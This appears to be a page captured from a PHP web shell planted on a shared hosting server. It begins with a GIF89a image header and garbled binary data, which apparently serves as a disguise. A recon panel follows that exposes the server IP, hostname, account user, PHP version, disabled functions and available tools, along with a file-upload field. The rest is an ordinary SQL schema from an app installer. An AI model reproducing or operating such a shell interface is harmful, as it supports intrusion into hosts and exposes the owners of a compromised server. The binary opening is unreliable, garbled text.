GIF89a=( ý' 7IAXKgNgYvYx\%wh&h}týh%ýs%xý}9ýRýý&ý0%ý (ý.ýý5ýSDýý&ýa)ýx5ýý;c*!&r)ï7õ<{4ý3ýH§KoTýýYýaqýýqýýFý !ý ' !ýNETSCAPE2.0 , =( ýýpH,ý$rýl:x(tJýZý,výýzýýxL.:ýýzýnýýý|Nýýýýý~ýýýýýýý& !ý0`9Rý}ýý"ý"a:Sý~xýýýýýýýýgýýýEýýýýýýýRýýýEýýýýBýý ýý8ýýDýýý"ýný ýHýýLýýDkDýBýýýýýDýýýTýýýH ýGýýA Rý |ýým&ýýE8ýSýkGýAýpxýaýýýR2XBýýE8Iýýý6Xý:vT)ý~ýýqýåýý"F~%xý ý 4#Zý0O|-4BsýX:= Qý SalýýyXJ`G&|shýýK3l7ýB|ý$'7J©*0!ýýDýn=ýPýýýýý0`ýRýljýýýýv>ýýý5 ý.69ýødýýýýýnlvý9ýýf{ýýýPbxýl5}ýpýýýýý3aýýýIýOýýýý!>ýýýiýý9ýý#ýý)pýa ½ ý{ý)vmýý%D~6fýýs}RýDýW Eý`!ý ý&L8xý ý{)x`X/>ý}mýýRý*|`Dý=ý_ ^ý5!_&'aýOý7ýcýý`DCx`ý¥ý9ýYýFýýý`?ýý"ý ýn@`ý} lýý@4>ýd S ývýxNýý"@~dýý=ýgýs~Gýýýýýýud &p8Qý)«lXDýýýýA~HýySunýjýýýk*DýLHý] ýýC"JýýXb~ªwSt}6K,ýýqýS:9*:ýýýlý@ý`ýý ý.ìýt9ýSý[©:ýý=`9Nýýýý{¿ýA !Rý:ýýý6ýýxý0ý_ ý;ýýýýýý^ýýý#ýýýý!ýýýýUýýý;0L1ýýýýýp%AýýU,uýý%ýSýý!ýýý~`ýGýýýý ýýý=4ýnpý3ýýýýýýýýýuýuýn|%2ýIýýrý#0ýýJ``8ý@S@5ýýýý^`8Eý]ý.ýSýýý7 ý ý0ýj SýDý zýýýiýSýýýýý!ýýýlýýw9*ýDýIýnEXýýý &AýGoýQfýýFýý;ýýý}ýJýýýýF5ýýQ|ýýýXýýTýýyýýý]ý o ýýC=ýý:ýýýPB@ DýSý(>ýCýx}`ýýxJ,ýàýýp+eE0`ý}`Aý/NEýý ý9@ýýý Hý7ý!%B0`ýl*ýý!8 2ý%ý ý:ý1ý0Eýýux%nP1ý!ýC)ýP81lýxF#¬{ýýýýB0>ýý
Server IP : 217.18.85.50 / Your IP : 3.143.17.175 Web Server : LiteSpeed System : Linux server50.tr85.dhs.com.tr 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64 User : ferhatgenc ( ) PHP Version : 7.2.34 Disable Function : restore_ini,mail,openbasedir,f_open,system,dl,array_compare,array_user_key_compare,passthru,cat,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,ini_restore,mysql_list_dbs,getmyuid,pconnect,link,symlink,fin,passthruexec,fileread,shell_exec,pcntl_exec,ini_alter,leak,apache_child_terminate,chown,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,allow_url_fopen,fpassthru,execute,shell,chgrp,passthru,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,foreach,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_version,apache_getenv,apache_note,apache_setenv,virtualal MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /var/softaculous/pods/ |
Upload File : |
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; -- -- Database: `people` -- -- -------------------------------------------------------- -- -- Table structure for table `activity` -- CREATE TABLE `activity` ( `userId` bigint(12) DEFAULT NULL, `targetUserId` bigint(12) DEFAULT NULL, `targetContentId` bigint(12) DEFAULT NULL, `targetContentType` varchar(25) DEFAULT NULL, `resultContentId` bigint(12) DEFAULT NULL, `resultContentType` varchar(25) DEFAULT NULL, `message` varchar(255) DEFAULT NULL, `targetMessage` varchar(255) DEFAULT NULL, `userMessage` varchar(255) DEFAULT NULL, `gid` varchar(25) DEFAULT NULL, `date` datetime DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, UNIQUE KEY `id` (`id`), UNIQUE KEY `gidx` (`gid`), KEY `uid` (`userId`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=65 ; -- -- Dumping data for table `activity` -- -- -------------------------------------------------------- -- -- Table structure for table `alerts` -- CREATE TABLE `alerts` ( `id` bigint(12) NOT NULL AUTO_INCREMENT, `userId` bigint(12) DEFAULT NULL, `targetUserId` bigint(12) DEFAULT NULL, `targetContentId` bigint(12) DEFAULT NULL, `targetContentType` varchar(25) DEFAULT NULL, `message` varchar(255) DEFAULT NULL, `date` datetime DEFAULT NULL, `status` enum('new','read') DEFAULT 'new', PRIMARY KEY (`id`), KEY `uid` (`targetUserId`), KEY `targetidx` (`targetContentId`,`targetContentType`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=72 ; -- -- Dumping data for table `alerts` -- -- -------------------------------------------------------- -- -- Table structure for table `comments` -- CREATE TABLE `comments` ( `contentId` bigint(12) DEFAULT NULL, `profileId` bigint(12) DEFAULT NULL, `userId` bigint(12) DEFAULT NULL, `date` datetime DEFAULT NULL, `comment` text, `type` varchar(12) DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`id`), KEY `doc_idx` (`contentId`), KEY `pid` (`profileId`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=82 ; -- -- Dumping data for table `comments` -- -- -------------------------------------------------------- -- -- Table structure for table `content` -- CREATE TABLE `content` ( `userId` bigint(12) DEFAULT NULL, `createdBy` bigint(12) DEFAULT NULL, `parentId` bigint(12) DEFAULT NULL, `groupId` bigint(12) DEFAULT NULL, `date` datetime DEFAULT NULL, `changeDate` datetime DEFAULT NULL, `body` text, `headline` text, `link` varchar(1024) DEFAULT NULL, `type` varchar(12) DEFAULT NULL, `privacy` enum('public','friends_only','group_only','owner_only') DEFAULT 'public', `status` enum('new','approved','featured','hidden') DEFAULT 'new', `flagDate` datetime DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, `commentCount` bigint(12) DEFAULT '0', `yes_votes` int(11) DEFAULT '0', `no_votes` int(11) DEFAULT '0', `stub` text, `editDate` datetime DEFAULT NULL, `commentDate` datetime DEFAULT NULL, `hidden` int(1) DEFAULT '0', PRIMARY KEY (`id`), KEY `datesort` (`date`), KEY `uidx` (`userId`), KEY `datex` (`date`), KEY `gidx` (`groupId`), FULLTEXT KEY `idx_full` (`headline`,`link`,`body`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=123 ; -- -- Dumping data for table `content` -- -- -------------------------------------------------------- -- -- Table structure for table `files` -- CREATE TABLE `files` ( `file_name` varchar(60) DEFAULT NULL, `original_name` varchar(60) DEFAULT NULL, `description` varchar(255) DEFAULT NULL, `extension` varchar(6) DEFAULT NULL, `mime_type` varchar(32) DEFAULT NULL, `userId` bigint(12) DEFAULT NULL, `contentId` bigint(12) DEFAULT NULL, `groupId` bigint(12) DEFAULT NULL, `changeDate` datetime DEFAULT NULL, `date` datetime DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`id`), KEY `didx` (`contentId`), KEY `uidx` (`userId`), KEY `gid` (`groupId`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=30 ; -- -- Dumping data for table `files` -- -- -------------------------------------------------------- -- -- Table structure for table `flags` -- CREATE TABLE `flags` ( `type` enum('content','user','group','comment','file') DEFAULT NULL, `itemId` bigint(12) DEFAULT NULL, `name` varchar(100) DEFAULT NULL, `value` text, `userId` bigint(12) DEFAULT NULL, `date` datetime DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`id`), KEY `lookup` (`type`,`itemId`,`name`,`userId`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=77 ; -- -- Dumping data for table `flags` -- -- -------------------------------------------------------- -- -- Table structure for table `groupMember` -- CREATE TABLE `groupMember` ( `userId` bigint(12) DEFAULT NULL, `groupId` bigint(12) DEFAULT NULL, `type` enum('invitee','owner','manager','member') DEFAULT NULL, `date` datetime DEFAULT NULL, UNIQUE KEY `nodupes` (`userId`,`groupId`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; -- -- Dumping data for table `groupMember` -- -- -------------------------------------------------------- -- -- Table structure for table `groups` -- CREATE TABLE `groups` ( `groupname` varchar(255) DEFAULT NULL, `description` text, `stub` varchar(40) DEFAULT NULL, `type` enum('public','private') DEFAULT NULL, `userId` bigint(12) DEFAULT NULL, `date` datetime DEFAULT NULL, `changeDate` datetime DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=4 ; -- -- Dumping data for table `groups` -- -- -------------------------------------------------------- -- -- Table structure for table `invites` -- CREATE TABLE `invites` ( `userId` bigint(12) DEFAULT NULL, `groupId` bigint(12) DEFAULT NULL, `email` varchar(255) DEFAULT NULL, `date` datetime DEFAULT NULL, `code` varchar(200) DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ; -- -- Dumping data for table `invites` -- -- -------------------------------------------------------- -- -- Table structure for table `messages` -- CREATE TABLE `messages` ( `id` bigint(12) NOT NULL AUTO_INCREMENT, `userId` bigint(12) NOT NULL, `targetUserId` bigint(12) DEFAULT NULL, `fromId` bigint(12) NOT NULL, `message` text, `date` datetime DEFAULT NULL, `status` enum('new','read','flagged','spam') DEFAULT 'new', PRIMARY KEY (`id`), KEY `user_and_friend` (`userId`,`targetUserId`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=55 ; -- -- Dumping data for table `messages` -- -- -------------------------------------------------------- -- -- Table structure for table `meta` -- CREATE TABLE `meta` ( `type` enum('group','content','user','comment','file') NOT NULL, `itemId` bigint(12) NOT NULL, `name` varchar(100) NOT NULL, `value` text NOT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`id`), UNIQUE KEY `u` (`type`,`itemId`,`name`), KEY `lookup` (`type`,`itemId`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=50 ; -- -- Dumping data for table `meta` -- INSERT INTO `meta` VALUES('user', 5, 'adminUser', '1', 49); -- -------------------------------------------------------- -- -- Table structure for table `tagRef` -- CREATE TABLE `tagRef` ( `tagId` bigint(12) DEFAULT NULL, `itemId` bigint(12) DEFAULT NULL, `type` enum('content','user','group','comment','file') DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`id`), KEY `lookup` (`type`,`itemId`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ; -- -- Dumping data for table `tagRef` -- -- -------------------------------------------------------- -- -- Table structure for table `tags` -- CREATE TABLE `tags` ( `value` varchar(100) DEFAULT NULL, `weight` bigint(12) DEFAULT '0', `date` datetime DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ; -- -- Dumping data for table `tags` -- -- -------------------------------------------------------- -- -- Table structure for table `users` -- CREATE TABLE `users` ( `nick` varchar(255) DEFAULT NULL, `fullname` varchar(255) DEFAULT NULL, `stub` varchar(255) DEFAULT NULL, `email` varchar(255) DEFAULT NULL, `id` bigint(12) NOT NULL AUTO_INCREMENT, `password` varchar(100) DEFAULT NULL, `memberSince` datetime DEFAULT NULL, `date` datetime DEFAULT NULL, `homepage` varchar(255) DEFAULT NULL, `lastVisit` datetime DEFAULT NULL, `verificationKey` varchar(200) DEFAULT NULL, `authSecret` varchar(32) DEFAULT NULL, `passwordResetCode` varchar(32) DEFAULT NULL, `invitedBy` bigint(12) DEFAULT NULL, `birthday` date DEFAULT NULL, `zipcode` varchar(10) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=6 ; -- -- Dumping data for table `users` -- INSERT INTO `users` VALUES('[[admin_username]]', NULL, '[[admin_username]]', '[[admin_email]]', 5, NULL, '[[regtime]]', NULL, NULL, '[[regtime]]', NULL, '[[admin_pass]]', NULL, NULL, NULL, NULL);